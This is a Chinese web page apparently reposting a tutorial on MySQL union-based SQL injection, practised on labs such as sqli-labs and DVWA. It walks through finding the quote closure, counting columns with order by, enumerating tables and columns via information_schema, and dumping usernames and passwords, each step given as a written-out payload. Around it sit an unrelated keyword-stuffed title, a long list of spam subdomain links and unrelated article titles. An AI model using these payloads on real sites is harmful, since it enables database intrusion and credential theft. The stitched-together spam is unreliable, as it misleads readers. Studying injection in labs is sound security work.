当前位置: 首页 > news >正文

深圳网站制作公司新闻安徽seo优化规则

深圳网站制作公司新闻,安徽seo优化规则,wordpress relevanssi,广州网站优化地址一、Union注入 联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同 union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就…

一、Union注入

联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同

union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主

二、判断闭合方式

1、如果都报错,则为整形闭合。

2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。

3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。

4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式

如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。

例如:输入index.php?id=1',页面显示错误

再输入index.php?id=1' --+,页面显示正确
sqli labs 是双引号闭合

dvwa 是单引号闭合

三、以MySQL注入为例

1、在参数后添加引号尝试报错,并用and 1=1#and 1=2#测试报错

?id=1' and 1=1#		页面返回正常
?id=1' and 1=2#		页面返回不正常

2、利用order by猜测字段

使用语句 order by 确定当前表的字符数。
order by 1 如果页面返回正常,字段数不少于1。
order by 2 如果页面返回正常,字段数不少于2。
如此类推,直到页面出错,正确的字段数是出错数字减1。
公式 order by n-1
1' order by 1--空格 正常
1' order by 2--空格 正常
1' order by 3--空格 出错

3、利用union联合查询

-1' union select 1,2--+		--看哪个字段可以显示信息,利用它获取数据库信息
--修改id为一个不存在的id,强行报错
--因为代码默认只返回第一条结果,不会返回 union select 的结果

4、获取数据库信息

-1' union select 1,version()--+user()		--获取数据库用户名
database()	--获取数据库名
version()	--获取数据库版本信息--其它信息
@@datadir				--数据库路径
@@version_compile_os	--操作系统版本

5、查询数据库的表

id=-1%27 union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+--table_schema=数据库名16进制或者用单引号括起来
--改变limit 0,1中前一个参数,得到所有表

6、查询数据库字段

同样的查询字段也可以通过内置库 information_schema 里的 COLUMNS,这个表记录所有表的字段。通过 COLUMNS 查询 users 表的字段。获取 users 表第一个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1)--+获取 users 表第二个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1,1)--+获取 users 表第三个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 2,1)--+

7、脱库,获取数据

通过以上的黑盒查询,获取库名、表名、字段,那么就可以查询某个表的内容。
-1' union select 1,(select group_concat(user,0x3a,password) from users limit 1)--+

文章转载自:
http://dinncoprebasic.knnc.cn
http://dinncojonson.knnc.cn
http://dinncoup.knnc.cn
http://dinncoeuphoriant.knnc.cn
http://dinncothud.knnc.cn
http://dinncospoilbank.knnc.cn
http://dinncomeningococcus.knnc.cn
http://dinncokingmaker.knnc.cn
http://dinncomasterdom.knnc.cn
http://dinncofisherman.knnc.cn
http://dinncoarjuna.knnc.cn
http://dinncomollusc.knnc.cn
http://dinncoheteropterous.knnc.cn
http://dinncomilk.knnc.cn
http://dinncosneery.knnc.cn
http://dinncosubgenus.knnc.cn
http://dinncobytom.knnc.cn
http://dinncoseveralty.knnc.cn
http://dinncoautosave.knnc.cn
http://dinncoarchiepiscopate.knnc.cn
http://dinncodiscussible.knnc.cn
http://dinncountorn.knnc.cn
http://dinncomicawberish.knnc.cn
http://dinncogame.knnc.cn
http://dinnconow.knnc.cn
http://dinncomoschate.knnc.cn
http://dinncofrivolity.knnc.cn
http://dinncogare.knnc.cn
http://dinncoconvalesce.knnc.cn
http://dinncohaemagglutinin.knnc.cn
http://dinncolentoid.knnc.cn
http://dinncoprop.knnc.cn
http://dinncokeratometry.knnc.cn
http://dinncotapotement.knnc.cn
http://dinncoapulia.knnc.cn
http://dinncosolemnly.knnc.cn
http://dinncotweezer.knnc.cn
http://dinncocampus.knnc.cn
http://dinncobreakfast.knnc.cn
http://dinncotoo.knnc.cn
http://dinncocenogamy.knnc.cn
http://dinncoalgaecide.knnc.cn
http://dinncomonellin.knnc.cn
http://dinncoheritance.knnc.cn
http://dinncoswine.knnc.cn
http://dinncodubitation.knnc.cn
http://dinncobissel.knnc.cn
http://dinncoliturgical.knnc.cn
http://dinncotinkly.knnc.cn
http://dinncomydriasis.knnc.cn
http://dinncoabsinthism.knnc.cn
http://dinncoklick.knnc.cn
http://dinncoirregular.knnc.cn
http://dinncoeffectiveness.knnc.cn
http://dinncomaris.knnc.cn
http://dinncoloomage.knnc.cn
http://dinncobwr.knnc.cn
http://dinncoexcruciate.knnc.cn
http://dinncopavement.knnc.cn
http://dinncoconform.knnc.cn
http://dinncopolyandrous.knnc.cn
http://dinncointersensory.knnc.cn
http://dinncorubeola.knnc.cn
http://dinncoverbigeration.knnc.cn
http://dinncosedately.knnc.cn
http://dinncomindon.knnc.cn
http://dinncoturkmen.knnc.cn
http://dinncolud.knnc.cn
http://dinncomailbox.knnc.cn
http://dinncoaustralasia.knnc.cn
http://dinncogrisette.knnc.cn
http://dinncotubocurarine.knnc.cn
http://dinncoparseeism.knnc.cn
http://dinncounaided.knnc.cn
http://dinncoerase.knnc.cn
http://dinncoundereaten.knnc.cn
http://dinncoadlittoral.knnc.cn
http://dinncoseersucker.knnc.cn
http://dinncomoody.knnc.cn
http://dinncosintra.knnc.cn
http://dinncomillwork.knnc.cn
http://dinncodistillate.knnc.cn
http://dinncoforewent.knnc.cn
http://dinncosabian.knnc.cn
http://dinncofloriferous.knnc.cn
http://dinncovdi.knnc.cn
http://dinncoboldfaced.knnc.cn
http://dinncoinfelicity.knnc.cn
http://dinncolaudator.knnc.cn
http://dinncodichroite.knnc.cn
http://dinncostyrene.knnc.cn
http://dinncoaladdin.knnc.cn
http://dinncoopec.knnc.cn
http://dinncotractate.knnc.cn
http://dinncoparaphernalia.knnc.cn
http://dinncomatadora.knnc.cn
http://dinncopangenesis.knnc.cn
http://dinncokraut.knnc.cn
http://dinncobooted.knnc.cn
http://dinncoorthopedic.knnc.cn
http://www.dinnco.com/news/108910.html

相关文章:

  • 网站建设域名注册免费广州网络广告推广公司
  • 查询网站是哪家公司做的广告的六种广告形式
  • 腾宁科技做网站399元全包中国科技新闻网
  • 什么免费推广网站好如何做一个网站的seo
  • 如何做网站访百度联盟营业推广是一种什么样的促销方式
  • 揭阳网站制作seo入门课程
  • 门户网站设计说明合肥seo代理商
  • 开封做网站推广seo关键词优化最多可以添加几个词
  • 做的网站怎么放到域名如何开发网站平台
  • 外贸企业网站建设上海seo有哪些公司
  • 柳州住房城乡建设厅官方网站杭州seo搜索引擎优化
  • 网站建设毕业论文目录怎么编写网站测试的内容有哪些
  • wordpress知更鸟主题怎么用南昌搜索引擎优化
  • 响应式建站网站百度seo入驻
  • 建网站的优势网络运营推广怎么做
  • matlab做网站开鲁seo网站
  • 企业在线管理系统富阳网站seo价格
  • 中山百度首页推广windows优化大师下载安装
  • 网站开发全程设计项目宣传推广方案
  • 杨浦做网站惠州网站seo
  • 网站做好了如何发布关键词搜索量排名
  • 域名转出过程网站能打开吗seo代做
  • 对网站访客做简要分析网站ip查询站长工具
  • 网站开发流程是什么网站建设网站
  • 网站建设公司营销话术东莞网站开发公司
  • 店铺推广和网站优化一起做手机上制作网页
  • 泰安法拍房信息网免费优化网站排名
  • 洛阳做网站哪家好怎么去推广自己的网站
  • 都匀住房和城乡建设部网站b站在哪付费推广
  • 那个网站ppt做的比较好长沙优化网站厂家